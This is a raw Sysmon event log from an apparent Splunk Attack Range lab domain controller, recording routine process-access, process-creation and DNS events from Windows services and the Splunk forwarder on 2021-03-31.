12:01:12.002{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003000Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:12.002{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002999Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:12.002{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002998Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:12.002{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002997Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:12.002{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6487-6064-7600-00000000AE01}4528C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002996Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:12.002{266CAFBE-647D-6064-2F00-00000000AE01}27964104C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6487-6064-7600-00000000AE01}4528C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002995Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:11.798{266CAFBE-6487-6064-7600-00000000AE01}4528C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe8.0.2Performance monitorsplunk ApplicationSplunk Inc.splunk-perfmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=1F3027C93882E5D5A667B84CCEF3ED67,SHA256=504CDB3742BCBF617C837270CCEC0243205B7BF0A6AB5117EFB838DD2F004AAC,IMPHASH=53D37CD53647C5D82FCFA9E6970E154E{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003037Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:13.721{266CAFBE-6489-6064-7800-00000000AE01}45884592C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003036Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:13.565{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6489-6064-7800-00000000AE01}4588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003035Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:13.565{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003034Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:13.565{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003033Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:13.565{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003032Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:13.565{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003031Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:13.565{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003030Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:13.565{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003029Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:13.565{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003028Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:13.565{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003027Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:13.565{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003026Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:13.565{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6489-6064-7800-00000000AE01}4588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003025Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:13.565{266CAFBE-647D-6064-2F00-00000000AE01}27964104C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6489-6064-7800-00000000AE01}4588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000003024Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:13.566{266CAFBE-6489-6064-7800-00000000AE01}4588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000003023Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:11.483{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local56610- 10341000x80000000000000003022Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:13.049{266CAFBE-6488-6064-7700-00000000AE01}45564560C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003056Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.799{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003055Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.799{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003054Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.799{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003053Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.799{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 